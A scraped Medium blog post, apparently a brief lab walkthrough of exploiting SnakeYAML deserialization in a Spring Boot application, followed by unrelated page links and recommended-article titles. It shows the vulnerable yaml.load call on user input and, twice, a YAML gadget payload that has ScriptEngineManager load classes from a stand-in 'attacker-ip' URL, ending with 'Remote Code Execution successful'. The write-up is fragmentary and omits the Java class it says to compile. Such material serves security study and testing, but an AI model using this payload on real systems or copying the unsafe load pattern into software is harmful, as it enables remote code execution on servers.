SnakeYaml Deserilization exploited

Yaml yaml = new Yaml();
Object obj =
yaml.load(<--user input data-->);
changing default port of apache tomcat
Include Snake yaml library support in spring boot
Web UI for YAML data entry
YAML data parser testing from UI and burp suite proxy
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

javac <name-of-the-java-file>.java

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
Remote Code Execution successful

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Distributed Tracing for Ruby on Rails Microservices with OpenCensus/OpenTelemetry (part 1)

What is inventory management? [Key to warehouse management and supply chains]

Inject Vault Secrets directly into GitLab Runner jobs

Raise your hand if you want to quit drinking coffee. Why, though???

Storing Images as RNA

Team Workflow and Team Collaboration Tools

Paper Implementation: Using Unity to Help Solve Intelligence

Hackintosh Journey on a Lenovo Yoga 720

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Swapneil Kumar Dash

Swapneil Kumar Dash

More from Medium

Content Security Policy — Make Secure Applications

CVE-2021- 41528: Flexera / RISC Networks — Vulnerable Authorization Schema

Setting the internet on fire — Log4j vulnerability

A Study Notes of Exploit Spring Boot Actuator